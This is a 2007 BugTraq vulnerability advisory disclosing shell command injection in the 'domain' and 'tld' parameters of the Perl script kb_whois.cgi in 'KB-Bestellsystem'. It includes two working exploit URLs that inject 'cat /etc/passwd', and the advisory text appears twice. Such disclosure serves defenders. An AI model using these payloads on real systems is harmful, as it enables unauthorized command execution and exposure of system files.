BugTraq
Back to list
|
Post reply
Remote Shell Command Execution in "KB-Bestellsystem" (amensa-soft.de)
Nov 22 2007 11:19AM
zero-x linuxmail org
"KB-Bestellsystem" is a domain order system written in Perl.
The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters.
The following examples will show you the /etc/passwd file:
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&d
omain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&d
omain=google&tld=.com;cat /etc/passwd;&tarrif=
<< Greetz Zero X >>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters.
The following examples will show you the /etc/passwd file:
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&d
omain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&d
omain=google&tld=.com;cat /etc/passwd;&tarrif=
<< Greetz Zero X >>
[ reply ]